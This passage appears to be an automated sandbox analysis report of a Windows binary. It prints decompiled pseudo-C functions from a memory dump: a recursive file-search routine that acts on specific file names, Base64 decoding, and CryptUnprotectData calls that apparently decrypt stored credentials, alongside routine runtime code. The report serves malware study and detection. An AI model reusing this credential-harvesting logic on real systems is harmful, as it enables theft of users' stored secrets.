0x0041a681
0x0041a692
0x0041a698
0x0041a69f
0x0041a6a1
0x0041a6b3
0x0041a6c9
0x0041a6b0
0x0041a6b0
0x0041a6b3
0x0041a69f
0x0041a6d3

APIs

LocalAlloc.KERNEL32(00000040,-00000001), ref: 0041A692

Memory Dump Source

Source File: 00000005.00000002.388217093.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: AllocLocal
String ID:
API String ID: 3494564517-0
Opcode ID: f62b4cc9df38aef14b84487fe742b955498fe79851fa3c667fef58cb3f26ec8b
Instruction ID: 6f218876d02809b0f930414e878dbd73697476ed213fc8bb2e3011cf8be7acb7
Opcode Fuzzy Hash: f62b4cc9df38aef14b84487fe742b955498fe79851fa3c667fef58cb3f26ec8b
Instruction Fuzzy Hash: 9A01FB30905108EBCB04DF98C5857EC7BB1EF04308F288099D9466B394C3795EA8DF4A

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 0041D360, Relevance: 10.7, APIs: 5, Strings: 1, Instructions: 195
fileCOMMON

Download Yara Rule

C-Code - Quality: 93%

			E0041D360(void* __ebx, void* __edi, void* __esi, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12) {
				signed int _v8;
				char _v276;
				void* _v280;
				struct _WIN32_FIND_DATAA _v604;
				char _v868;
				intOrPtr* _v872;
				intOrPtr* _v876;
				char _v877;
				char _v878;
				intOrPtr _v884;
				intOrPtr _v888;
				intOrPtr* _v892;
				intOrPtr* _v896;
				char _v897;
				char _v898;
				intOrPtr _v904;
				intOrPtr _v908;
				signed int _t84;
				intOrPtr* _t90;
				intOrPtr* _t94;
				void* _t98;
				void* _t99;
				intOrPtr _t100;
				void* _t101;
				void* _t116;
				CHAR* _t117;
				char _t119;
				char _t124;
				intOrPtr _t127;
				char _t136;
				char _t137;
				intOrPtr _t144;
				void* _t157;
				void* _t158;
				signed int _t159;
				void* _t160;
				void* _t161;
				void* _t163;
				void* _t164;

				_t158 = __esi;
				_t157 = __edi;
				_t116 = __ebx;
				_t84 =  *0x4301f4; // 0x3b2bc12f
				_v8 = _t84 ^ _t159;
				_t117 =  *0x4324d0; // 0xc16788
				_t138 =  &_v276;
				wsprintfA( &_v276, _t117, _a8);
				_t161 = _t160 + 0xc;
				_v280 = FindFirstFileA( &_v276,  &_v604);
				if(_v280 != 0xffffffff) {
					do {
						_v872 = ".";
						_v876 =  &(_v604.cFileName);
						while(1) {
							_t90 = _v876;
							_t119 =  *_t90;
							_v877 = _t119;
							if(_t119 !=  *_v872) {
								break;
							}
							if(_v877 == 0) {
								L7:
								_v884 = 0;
								L9:
								_v888 = _v884;
								if(_v888 == 0) {
									L18:
									goto L27;
								} else {
									_v892 = "..";
									_v896 =  &(_v604.cFileName);
									while(1) {
										_t94 = _v896;
										_t124 =  *_t94;
										_v897 = _t124;
										if(_t124 !=  *_v892) {
											break;
										}
										if(_v897 == 0) {
											L15:
											_v904 = 0;
											L17:
											_v908 = _v904;
											if(_v908 != 0) {
												wsprintfA( &_v868, "%s\\%s", _a8,  &(_v604.cFileName));
												_t144 =  *0x432474; // 0xc16968
												_t98 = E004052FA(_t158,  &(_v604.cFileName), _t144);
												_t163 = _t161 + 0x18;
												if(_t98 != 0) {
													_t127 =  *0x4320c8; // 0xc16350
													_t99 = E004052FA(_t158,  &(_v604.cFileName), _t127);
													_t164 = _t163 + 8;
													if(_t99 != 0) {
														_t100 =  *0x4322f4; // 0xc16938
														_t101 = E004052FA(_t158,  &(_v604.cFileName), _t100);
														_t161 = _t164 + 8;
														if(_t101 != 0) {
															if((_v604.dwFileAttributes & 0x00000010) != 0) {
																E0041D360(_t116, _t157, _t158,  &(_v604.cFileName),  &_v868, _a12);
																_t161 = _t161 + 0xc;
															}
														} else {
															E0041CDE0(_t116, _t157, _t158, _a4, _a12, _a8);
															E0041D360(_t116, _t157, _t158,  &(_v604.cFileName),  &_v868, _a12);
															_t161 = _t161 + 0x18;
														}
													} else {
														E0041B950(_t116, _t157, _t158,  &_v868, _a4, _a12);
														E0041D360(_t116, _t157, _t158,  &(_v604.cFileName),  &_v868, _a12);
														_t161 = _t164 + 0x18;
													}
												} else {
													E0041BB00(_t116, _t157, _t158,  &_v868, _a4, _a12);
													E0041D360(_t116, _t157, _t158,  &(_v604.cFileName),  &_v868, _a12);
													_t161 = _t163 + 0x18;
												}
												goto L27;
											}
											goto L18;
										}
										_t94 = _v896;
										_t136 =  *((intOrPtr*)(_t94 + 1));
										_v898 = _t136;
										_t41 = _v892 + 1; // 0x2500002e
										if(_t136 !=  *_t41) {
											break;
										}
										_v896 = _v896 + 2;
										_v892 = _v892 + 2;
										if(_v898 != 0) {
											continue;
										}
										goto L15;
									}
									asm("sbb eax, eax");
									asm("sbb eax, 0xffffffff");
									_v904 = _t94;
									goto L17;
								}
							}
							_t90 = _v876;
							_t137 =  *((intOrPtr*)(_t90 + 1));
							_v878 = _t137;
							_t19 = _v872 + 1; // 0x2e000000
							if(_t137 !=  *_t19) {
								break;
							}
							_v876 = _v876 + 2;
							_v872 = _v872 + 2;
							if(_v878 != 0) {
								continue;
							}
							goto L7;
						}
						asm("sbb eax, eax");
						asm("sbb eax, 0xffffffff");
						_v884 = _t90;
						goto L9;
						L27:
					} while (FindNextFileA(_v280,  &_v604) != 0);
					_t138 = _v280;
					_t89 = FindClose(_v280);
					goto L29;
				} else {
					L29:
					return E00404354(_t89, _t116, _v8 ^ _t159, _t138, _t157, _t158);
				}
			}

0x0041d360
0x0041d360
0x0041d360
0x0041d369
0x0041d370
0x0041d377
0x0041d37e
0x0041d385
0x0041d38b
0x0041d3a2
0x0041d3af
0x0041d3b6
0x0041d3b6
0x0041d3c6
0x0041d3cc
0x0041d3cc
0x0041d3d2
0x0041d3d4
0x0041d3e2
0x00000000
0x00000000
0x0041d3eb
0x0041d41e
0x0041d41e
0x0041d435
0x0041d43b
0x0041d448
0x0041d4e2
0x00000000
0x0041d44e
0x0041d44e
0x0041d45e
0x0041d464
0x0041d464
0x0041d46a
0x0041d46c
0x0041d47a
0x00000000
0x00000000
0x0041d483
0x0041d4b6
0x0041d4b6
0x0041d4cd
0x0041d4d3
0x0041d4e0
0x0041d4fe
0x0041d507
0x0041d515
0x0041d51a
0x0041d51f
0x0041d557
0x0041d565
0x0041d56a
0x0041d56f
0x0041d5a4
0x0041d5b1
0x0041d5b6
0x0041d5bb
0x0041d5f6
0x0041d60a
0x0041d60f
0x0041d60f
0x0041d5bd
0x0041d5c9
0x0041d5e3
0x0041d5e8
0x0041d5e8
0x0041d571
0x0041d580
0x0041d59a
0x0041d59f
0x0041d59f
0x0041d521
0x0041d530
0x0041d54a
0x0041d54f
0x0041d54f
0x00000000
0x0041d51f
0x00000000
0x0041d4e0
0x0041d485
0x0041d48b
0x0041d48e
0x0041d49a
0x0041d49d
0x00000000
0x00000000
0x0041d49f
0x0041d4a6
0x0041d4b4
0x00000000
0x00000000
0x00000000
0x0041d4b4
0x0041d4c2
0x0041d4c4
0x0041d4c7
0x00000000
0x0041d4c7
0x0041d448
0x0041d3ed
0x0041d3f3
0x0041d3f6
0x0041d402
0x0041d405
0x00000000
0x00000000
0x0041d407
0x0041d40e
0x0041d41c
0x00000000
0x00000000
0x00000000
0x0041d41c
0x0041d42a
0x0041d42c
0x0041d42f
0x00000000
0x0041d612
0x0041d626
0x0041d62e
0x0041d635
0x00000000
0x0041d3b1
0x0041d63b
0x0041d648
0x0041d648

APIs

wsprintfA.USER32 ref: 0041D385
FindFirstFileA.KERNEL32(?,?), ref: 0041D39C
FindNextFileA.KERNEL32(000000FF,?), ref: 0041D620
FindClose.KERNEL32(000000FF), ref: 0041D635

Strings

%s\%s, xrefs: 0041D4F2

Memory Dump Source

Source File: 00000005.00000002.388217093.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: Find$File$CloseFirstNextwsprintf
String ID: %s\%s
API String ID: 180737720-4073750446
Opcode ID: c49c3285ecb05f5683d9ddeabd609b6d1b2e2c7352a1e30b0cf6d5982bb404fd
Instruction ID: 8d6772620004ab98778aaf826b3c11eb8719ab671def5e114653b2d69454eaec
Opcode Fuzzy Hash: c49c3285ecb05f5683d9ddeabd609b6d1b2e2c7352a1e30b0cf6d5982bb404fd
Instruction Fuzzy Hash: 86815BB1D04228ABCB26CF64DC85BEAB7B9BB58300F0486DAE51D57241D734ABC4CF55

Uniqueness

Uniqueness Score: -1.00%

Function 0041C900, Relevance: 7.6, APIs: 5, Instructions: 111
stringencryptionCOMMON

Download Yara Rule

C-Code - Quality: 21%

			E0041C900(void* __ebx, void* __edi, void* __esi, char* _a4) {
				int _v8;
				BYTE* _v12;
				char _v16;
				int _v20;
				DWORD* _v24;
				intOrPtr _v28;
				signed int _v32;
				char _v8132;
				BYTE* _v8136;
				DWORD* _v8140;
				DWORD* _v8144;
				char _v8148;
				intOrPtr* _v8152;
				intOrPtr _v8156;
				char _v8157;
				int _v8164;
				signed int _t53;
				intOrPtr _t65;
				intOrPtr _t70;
				void* _t75;
				void* _t93;
				void* _t94;
				signed int _t95;
				void* _t96;
				void* _t97;
				void* _t98;

				_t94 = __esi;
				_t93 = __edi;
				_t75 = __ebx;
				E00412A40(0x1fe0);
				_t53 =  *0x4301f4; // 0x3b2bc12f
				_v32 = _t53 ^ _t95;
				_v20 = 0x1fa0;
				_v24 = 0;
				_v8136 = 0x4293ae;
				E004091C0( &_v8132, 0, 0x1fa0);
				_t97 = _t96 + 0xc;
				_v8152 = _a4;
				_v8156 = _v8152 + 1;
				do {
					_v8157 =  *_v8152;
					_v8152 = _v8152 + 1;
				} while (_v8157 != 0);
				_v8164 = _v8152 - _v8156;
				_t90 = _v8164;
				if(CryptStringToBinaryA(_a4, _v8164, 1,  &_v8132,  &_v20, 0, 0) != 0) {
					_v24 =  *0x432708();
					if(_v24 == 0) {
						_t90 = _v8136;
						 *0x4328c4(_v8136, 0x42942d);
					} else {
						_t65 =  *0x432748(_v24, 1, 0);
						_t98 = _t97 + 0xc;
						_v28 = _t65;
						if(_v28 != 0) {
							 *0x4328c4(_v8136, 0x429417);
						} else {
							_v12 =  &_v8132;
							_v8 = _v20;
							_v8144 = 0;
							_v8140 = 0;
							_t70 =  *0x432728( &_v16,  &_v8148, 0);
							_t98 = _t98 + 0xc;
							_v28 = _t70;
							if(_v28 != 0) {
								_t90 = _v8136;
								 *0x4328c4(_v8136, 0x4293af);
							} else {
								_t90 =  &_v8132;
								E00409240( &_v8132, _v8144, _v8140);
								_t98 = _t98 + 0xc;
								 *((char*)(_t95 + _v8140 - 0x1fc0)) = 0;
								_v8136 =  &_v8132;
							}
						}
						 *0x432730(_v24);
					}
				}
				return E00404354(_v8136, _t75, _v32 ^ _t95, _t90, _t93, _t94);
			}

0x0041c900
0x0041c900
0x0041c900
0x0041c908
0x0041c90d
0x0041c914
0x0041c917
0x0041c91e
0x0041c925
0x0041c93d
0x0041c942
0x0041c948
0x0041c957
0x0041c95d
0x0041c965
0x0041c96b
0x0041c972
0x0041c987
0x0041c99e
0x0041c9b1
0x0041c9bd
0x0041c9c4
0x0041ca9d
0x0041caa4
0x0041c9ca
0x0041c9d2
0x0041c9d8
0x0041c9db
0x0041c9e2
0x0041ca83
0x0041c9e8
0x0041c9ee
0x0041c9f4
0x0041c9f7
0x0041ca01
0x0041ca18
0x0041ca1e
0x0041ca21
0x0041ca28
0x0041ca68
0x0041ca6f
0x0041ca2a
0x0041ca38
0x0041ca3f
0x0041ca44
0x0041ca4d
0x0041ca5b
0x0041ca5b
0x0041ca75
0x0041ca8d
0x0041ca93
0x0041c9c4
0x0041cabd

APIs

_memset.LIBCMT ref: 0041C93D
CryptStringToBinaryA.CRYPT32(?,00000000,00000001,?,?,00000000,00000000), ref: 0041C9A9
lstrcat.KERNEL32(?,004293AF), ref: 0041CA6F
lstrcat.KERNEL32(?,00429417), ref: 0041CA83
lstrcat.KERNEL32(?,0042942D), ref: 0041CAA4

Memory Dump Source

Source File: 00000005.00000002.388217093.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: lstrcat$BinaryCryptString_memset
String ID:
API String ID: 351459361-0
Opcode ID: 27e67521fcb4946290682626cc12c91d94e13242a25856a399c3c5753c7069ad
Instruction ID: ede58a91b6acc3c9de34702f063b24e786dbcff6da73a4c054eb46c9bc76c427
Opcode Fuzzy Hash: 27e67521fcb4946290682626cc12c91d94e13242a25856a399c3c5753c7069ad
Instruction Fuzzy Hash: FA512774A0022E9FCB14DB94DE85BFEB7B5BF48344F1040B9E509A6280DBB45A84DF95

Uniqueness

Uniqueness Score: -1.00%

Function 00404354, Relevance: 7.6, APIs: 5, Instructions: 58
COMMON

Download Yara Rule

C-Code - Quality: 85%

			E00404354(intOrPtr __eax, intOrPtr __ebx, intOrPtr __ecx, intOrPtr __edx, intOrPtr __edi, intOrPtr __esi, char _a4) {
				intOrPtr _v0;
				void* _v804;
				intOrPtr _v808;
				intOrPtr _v812;
				intOrPtr _t6;
				intOrPtr _t11;
				intOrPtr _t12;
				intOrPtr _t13;
				long _t17;
				intOrPtr _t21;
				intOrPtr _t22;
				intOrPtr _t25;
				intOrPtr _t26;
				intOrPtr _t27;
				intOrPtr* _t31;
				void* _t34;

				_t27 = __esi;
				_t26 = __edi;
				_t25 = __edx;
				_t22 = __ecx;
				_t21 = __ebx;
				_t6 = __eax;
				_t34 = _t22 -  *0x4301f4; // 0x3b2bc12f
				if(_t34 == 0) {
					asm("repe ret");
				}
				 *0x431208 = _t6;
				 *0x431204 = _t22;
				 *0x431200 = _t25;
				 *0x4311fc = _t21;
				 *0x4311f8 = _t27;
				 *0x4311f4 = _t26;
				 *0x431220 = ss;
				 *0x431214 = cs;
				 *0x4311f0 = ds;
				 *0x4311ec = es;
				 *0x4311e8 = fs;
				 *0x4311e4 = gs;
				asm("pushfd");
				_pop( *0x431218);
				 *0x43120c =  *_t31;
				 *0x431210 = _v0;
				 *0x43121c =  &_a4;
				 *0x431158 = 0x10001;
				_t11 =  *0x431210; // 0x0
				 *0x43110c = _t11;
				 *0x431100 = 0xc0000409;
				 *0x431104 = 1;
				_t12 =  *0x4301f4; // 0x3b2bc12f
				_v812 = _t12;
				_t13 =  *0x4301f8; // 0xc4d43ed0
				_v808 = _t13;
				 *0x431150 = IsDebuggerPresent();
				_push(1);
				E0040EC2D(_t14);
				SetUnhandledExceptionFilter(0);
				_t17 = UnhandledExceptionFilter(0x427278);
				if( *0x431150 == 0) {
					_push(1);
					E0040EC2D(_t17);
				}
				return TerminateProcess(GetCurrentProcess(), 0xc0000409);
			}

0x00404354
0x00404354
0x00404354
0x00404354
0x00404354
0x00404354
0x00404354
0x0040435a
0x0040435c
0x0040435c
0x004071dc
0x004071e1
0x004071e7
0x004071ed
0x004071f3
0x004071f9
0x004071ff
0x00407206
0x0040720d
0x00407214
0x0040721b
0x00407222
0x00407229
0x0040722a
0x00407233
0x0040723b
0x00407243
0x0040724e
0x00407258
0x0040725d
0x00407262
0x0040726c
0x00407276
0x0040727b
0x00407281
0x00407286
0x00407292
0x00407297
0x00407299
0x004072a1
0x004072ac
0x004072b9
0x004072bb
0x004072bd
0x004072c2
0x004072d6

APIs

IsDebuggerPresent.KERNEL32 ref: 0040728C
SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 004072A1
UnhandledExceptionFilter.KERNEL32(00427278), ref: 004072AC
GetCurrentProcess.KERNEL32(C0000409), ref: 004072C8
TerminateProcess.KERNEL32(00000000), ref: 004072CF

Memory Dump Source

Source File: 00000005.00000002.388217093.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: ExceptionFilterProcessUnhandled$CurrentDebuggerPresentTerminate
String ID:
API String ID: 2579439406-0
Opcode ID: fb36ba7d8dfb059a8fb948a4e6824210f415b9b34b7e1691bccbcd4c0e549f5a
Instruction ID: db81a0622257a0c1f8b0d9a096f3957374a72d7ea4219b8a0101d48903aebac0
Opcode Fuzzy Hash: fb36ba7d8dfb059a8fb948a4e6824210f415b9b34b7e1691bccbcd4c0e549f5a
Instruction Fuzzy Hash: C72103B8905204DFCB00DF95FD45A853BA0BB0C345F4066BAE619E33B0D7B45A858F5D

Uniqueness

Uniqueness Score: -1.00%

Function 0041EED0, Relevance: 7.5, APIs: 5, Instructions: 49
memoryencryptionCOMMON

Download Yara Rule

C-Code - Quality: 16%

			E0041EED0(intOrPtr _a4, intOrPtr _a8) {
				void* _v8;
				short* _v12;
				int _v16;
				intOrPtr _v20;
				char _v24;

				_v8 = HeapAlloc(GetProcessHeap(), 8, 0x400);
				_v20 = _a4 + 1;
				_v24 = _a8 - 1;
				_push( &_v16);
				_push(1);
				_push(0);
				_push(0);
				_push(0);
				_push(0);
				_push( &_v24);
				if( *0x4327e0() == 0) {
					return 0x42945e;
				}
				WideCharToMultiByte(0, 0, _v12, _v16, _v8, 0x400, 0, 0);
				LocalFree(_v12);
				return _v8;
			}

0x0041eeea
0x0041eef3
0x0041eefc
0x0041ef02
0x0041ef03
0x0041ef05
0x0041ef07
0x0041ef09
0x0041ef0b
0x0041ef10
0x0041ef19
0x00000000
0x0041ef4b
0x0041ef34
0x0041ef3e
0x00000000

APIs

GetProcessHeap.KERNEL32(00000008,00000400), ref: 0041EEDD
HeapAlloc.KERNEL32(00000000), ref: 0041EEE4
CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000001,?), ref: 0041EF11
WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,?,00000400,00000000,00000000), ref: 0041EF34
LocalFree.KERNEL32(?), ref: 0041EF3E

Memory Dump Source

Source File: 00000005.00000002.388217093.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: Heap$AllocByteCharCryptDataFreeLocalMultiProcessUnprotectWide
String ID:
API String ID: 3657800372-0
Opcode ID: f7c8286202d5087fabcd1758784238c2633b5219daf29c0a4d3e60d8e81470b6
Instruction ID: 7a7d91f486f3f9dd6e7e10e959326cae4d393e6c11d0001657b75845fcc0ff40
Opcode Fuzzy Hash: f7c8286202d5087fabcd1758784238c2633b5219daf29c0a4d3e60d8e81470b6
Instruction Fuzzy Hash: 7B010075A44208BBDB14DB94DD45FAE77B8EB44704F108155FB05EB2C0D6B0AA418B59

Uniqueness

Uniqueness Score: -1.00%

Function 0041CBA0, Relevance: 6.1, APIs: 4, Instructions: 55
encryptionmemoryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E0041CBA0(void* __ecx, char* _a4, void** _a8, long* _a12) {
				int _v8;

				_v8 = 0;
				 *_a8 = 0;
				 *_a12 = 0;
				if(CryptStringToBinaryA(_a4, 0, 1, 0, _a12, 0, 0) != 0) {
					 *_a8 = LocalAlloc(0x40,  *_a12);
					if( *_a8 != 0) {
						_v8 = CryptStringToBinaryA(_a4, 0, 1,  *_a8, _a12, 0, 0);
						if(_v8 == 0) {
							 *_a8 = LocalFree( *_a8);
						}
					}
				}
				return _v8;
			}

0x0041cba4
0x0041cbae
0x0041cbb7
0x0041cbd7
0x0041cbea
0x0041cbf2
0x0041cc10
0x0041cc17
0x0041cc28
0x0041cc28
0x0041cc17
0x0041cbf2
0x0041cc30

APIs

CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,?,00000000,00000000), ref: 0041CBCF
LocalAlloc.KERNEL32(00000040), ref: 0041CBE1
CryptStringToBinaryA.CRYPT32(?,00000000,00000001,?,?,00000000,00000000), ref: 0041CC0A
LocalFree.KERNEL32 ref: 0041CC1F

Memory Dump Source

Source File: 00000005.00000002.388217093.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: BinaryCryptLocalString$AllocFree
String ID:
API String ID: 4291131564-0
Opcode ID: 59bee1e0bc0429589c7e47e899a4c77139c61073456810a9bffb9ff8eaa0a8b1
Instruction ID: 56bd40cd4ba821fc38e6c7a17e62a6f0de69d385e2ef2c3fb7c3c5633154ad88
Opcode Fuzzy Hash: 59bee1e0bc0429589c7e47e899a4c77139c61073456810a9bffb9ff8eaa0a8b1
Instruction Fuzzy Hash: F411D2B4240308AFEB10CF64CC95FAA77B5FB88B00F208459F9199B3D0D7B5A941CB94

Uniqueness

Uniqueness Score: -1.00%

Function 0041CD30, Relevance: 4.6, APIs: 3, Instructions: 61
encryptionCOMMON

Download Yara Rule

C-Code - Quality: 25%

			E0041CD30(void* __edx, void* __edi, void* __esi, void* __eflags, intOrPtr _a4, char _a8) {
				intOrPtr _v8;
				intOrPtr _v12;
				char _v16;
				intOrPtr _v20;
				char _v24;
				intOrPtr _v28;
				char _v32;

				_v8 = E0040537B(__edx, __edi, __esi, _a8);
				E00409240(_v8, _a4, _a8);
				_v12 = _a4;
				_v16 = _a8;
				_v28 = E0040537B(_a8, __edi, __esi, _a8);
				_push( &_v24);
				_push(0);
				_push(0);
				_push(0);
				_push(0);
				_push(0);
				_push( &_v16);
				if( *0x4327e0() == 0) {
					return 0;
				}
				_v32 = 0;
				while(_v32 < _v24) {
					 *((char*)(_v28 + _v32)) =  *((intOrPtr*)(_v20 + _v32));
					_v32 = _v32 + 1;
				}
				 *((char*)(_v28 + _v24)) = 0;
				return _v28;
			}

0x0041cd42
0x0041cd51
0x0041cd5c
0x0041cd62
0x0041cd71
0x0041cd77
0x0041cd78
0x0041cd7a
0x0041cd7c
0x0041cd7e
0x0041cd80
0x0041cd85
0x0041cd8e
0x00000000
0x0041cdcc
0x0041cd90
0x0041cda2
0x0041cdb8
0x0041cd9f
0x0041cd9f
0x0041cdc2
0x00000000

APIs

_malloc.LIBCMT ref: 0041CD3A

Part of subcall function 0040537B: __FF_MSGBANNER.LIBCMT ref: 00405394
Part of subcall function 0040537B: __NMSG_WRITE.LIBCMT ref: 0040539B
Part of subcall function 0040537B: RtlAllocateHeap.NTDLL(00000000,00000001,?,00000001,?,?,004046A4,00000001,00000000,?,?,?,00404702,?), ref: 004053C0

_malloc.LIBCMT ref: 0041CD69
CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000000,?), ref: 0041CD86

Memory Dump Source

Source File: 00000005.00000002.388217093.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: _malloc$AllocateCryptDataHeapUnprotect
String ID:
API String ID: 1951378374-0
Opcode ID: 68a5aae102f9efea595c834b1cc7f895f0ca6c2316e39983b41f57d4bf4d194e
Instruction ID: 8a43d0c20a99cd5a9278e18ba334847751e1c93ca7c103147f03c8bf539e0bba
Opcode Fuzzy Hash: 68a5aae102f9efea595c834b1cc7f895f0ca6c2316e39983b41f57d4bf4d194e
Instruction Fuzzy Hash: 98111FB5D04109EFCF00DF99D881AEFBBB4EF48304F148569E919A7341D638AA41CF99

Uniqueness

Uniqueness Score: -1.00%

Function 0041F6B0, Relevance: 1.5, APIs: 1, Instructions: 32
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E0041F6B0(void* __ecx, intOrPtr _a4) {
				union _FINDEX_INFO_LEVELS _v8;

				 *((intOrPtr*)(_a4 + 0x474)) = FindFirstFileExW( *(_a4 + 0x478), 0, _a4 + 0x220, 0, 0, 0);
				if( *((intOrPtr*)(_a4 + 0x474)) == 0xffffffff) {
					 *(_a4 + 0x470) = 0;
					_v8 = 0;
				} else {
					_v8 = _a4 + 0x220;
					 *(_a4 + 0x470) = 1;
				}
				return _v8;
			}

0x0041f6d8
0x0041f6e8
0x0041f707
0x0041f711
0x0041f6ea
0x0041f6f2
0x0041f6f8
0x0041f6f8
0x0041f71e

APIs

FindFirstFileExW.KERNEL32(?,00000000,?,00000000,00000000,00000000), ref: 0041F6CF

Memory Dump Source

Source File: 00000005.00000002.388217093.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: FileFindFirst
String ID:
API String ID: 1974802433-0
Opcode ID: b083bc97e9add199c494055086132be9c3c51d2e06752461036f936aa6750eb6
Instruction ID: 5127411f2ae3e63cd4fad2cc021074347c12ccf8fffb143314174e52205de00b
Opcode Fuzzy Hash: b083bc97e9add199c494055086132be9c3c51d2e06752461036f936aa6750eb6
Instruction Fuzzy Hash: D50131B4204208EBD700CF54C849B997BA4EB44758F144268EA4C4F3C1C776A986CBC8

Uniqueness

Uniqueness Score: -1.00%

Function 0040E5C7, Relevance: 1.5, APIs: 1, Instructions: 4
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E0040E5C7() {

				SetUnhandledExceptionFilter(E0040E585);
				return 0;
			}

0x0040e5cc
0x0040e5d4

APIs

SetUnhandledExceptionFilter.KERNEL32(Function_0000E585), ref: 0040E5CC

Memory Dump Source

Source File: 00000005.00000002.388217093.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: ExceptionFilterUnhandled
String ID:
API String ID: 3192549508-0
Opcode ID: cc4c5f65d686995c6eac9155ab9df3efbb6f948664e4aacc6aa127ea312579cb
Instruction ID: a5dc8636cf60ae7a0a84250136d9b4b03a71c5cc7ffb9929d82e7c1e62d0f7e1
Opcode Fuzzy Hash: cc4c5f65d686995c6eac9155ab9df3efbb6f948664e4aacc6aa127ea312579cb
Instruction Fuzzy Hash: DA9002A035614056C61017F15E196052D946E586067910CF97611E50D4FA64401A5519

Uniqueness

Uniqueness Score: -1.00%

Function 004196D0, Relevance: .0, Instructions: 15COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.388217093.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: eecc59efbe9cdf3acfc8abb57b86a9aab05cbe8bc62256deaf8fcc3308cb31aa
Instruction ID: abbdd297b848902a35704da264ecc4a7d2e6ec457c67c65f9fa5c7ab4ebdfac4
Opcode Fuzzy Hash: eecc59efbe9cdf3acfc8abb57b86a9aab05cbe8bc62256deaf8fcc3308cb31aa
Instruction Fuzzy Hash: 1EE04878A56608EFC740CF88D584E49B7F8EB0D720F1181D5ED099B721D235EE00EA90

Uniqueness

Uniqueness Score: -1.00%

Function 0041B750, Relevance: .0, Instructions: 7COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.388217093.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7398b6239bf8858e3d1776f2ebb5b6e80944bbaad592eaf912553e7d93e1029a
Instruction ID: e339c26aa805b3dbdccb0bbec68ffa90cfb8b186f9bf68622fd8779a8eafd4f1
Opcode Fuzzy Hash: 7398b6239bf8858e3d1776f2ebb5b6e80944bbaad592eaf912553e7d93e1029a
Instruction Fuzzy Hash: D5B092706124804AEB1287248415B4276E0A780B01F8984E0A00986982C39C9A849104

Uniqueness

Uniqueness Score: -1.00%

Function 00408594, Relevance: 42.1, APIs: 18, Strings: 6, Instructions: 109
libraryloadermemoryCOMMON

Download Yara Rule

C-Code - Quality: 62%

			E00408594(void* __ebx) {
				void* __edi;
				void* __esi;
				_Unknown_base(*)()* _t7;
				_Unknown_base(*)()* _t9;
				long _t10;
				void* _t11;
				int _t12;
				void* _t14;
				void* _t15;
				void* _t16;
				void* _t18;
				intOrPtr _t21;
				long _t26;
				void* _t30;
				struct HINSTANCE__* _t35;
				intOrPtr* _t36;
				void* _t39;
				intOrPtr* _t41;
				void* _t42;

				_t30 = __ebx;
				_t35 = GetModuleHandleW(L"KERNEL32.DLL");
				if(_t35 != 0) {
					 *0x431444 = GetProcAddress(_t35, "FlsAlloc");
					 *0x431448 = GetProcAddress(_t35, "FlsGetValue");
					 *0x43144c = GetProcAddress(_t35, "FlsSetValue");
					_t7 = GetProcAddress(_t35, "FlsFree");
					__eflags =  *0x431444;
					_t39 = TlsSetValue;
					 *0x431450 = _t7;
					if( *0x431444 == 0) {
						L6:
						 *0x431448 = TlsGetValue;
						_t9 = __imp__TlsFree; // 0x74786560
						 *0x431444 = E004082A4;
						 *0x43144c = _t39;
						 *0x431450 = _t9;
					} else {
						__eflags =  *0x431448;
						if( *0x431448 == 0) {
							goto L6;
						} else {
							__eflags =  *0x43144c;
							if( *0x43144c == 0) {
								goto L6;
							} else {
								__eflags = _t7;
								if(_t7 == 0) {
									goto L6;
								}
							}
						}
					}
					_t10 = TlsAlloc();
					 *0x430978 = _t10;
					__eflags = _t10 - 0xffffffff;
					if(_t10 == 0xffffffff) {
						L15:
						_t11 = 0;
						__eflags = 0;
					} else {
						_t12 = TlsSetValue(_t10,  *0x431448);
						__eflags = _t12;
						if(_t12 == 0) {
							goto L15;
						} else {
							E00408980();
							_t41 = __imp__EncodePointer;
							_t14 =  *_t41( *0x431444);
							 *0x431444 = _t14;
							_t15 =  *_t41( *0x431448);
							 *0x431448 = _t15;
							_t16 =  *_t41( *0x43144c);
							 *0x43144c = _t16;
							 *0x431450 =  *_t41( *0x431450);
							_t18 = E0040B0C5();
							__eflags = _t18;
							if(_t18 == 0) {
								L14:
								E004082E1();
								goto L15;
							} else {
								_t36 = __imp__DecodePointer;
								_t21 =  *((intOrPtr*)( *_t36()))( *0x431444, E00408465);
								 *0x430974 = _t21;
								__eflags = _t21 - 0xffffffff;
								if(_t21 == 0xffffffff) {
									goto L14;
								} else {
									_t42 = E0040880C(1, 0x214);
									__eflags = _t42;
									if(_t42 == 0) {
										goto L14;
									} else {
										__eflags =  *((intOrPtr*)( *_t36()))( *0x43144c,  *0x430974, _t42);
										if(__eflags == 0) {
											goto L14;
										} else {
											_push(0);
											_push(_t42);
											E0040831E(_t30, _t36, _t42, __eflags);
											_t26 = GetCurrentThreadId();
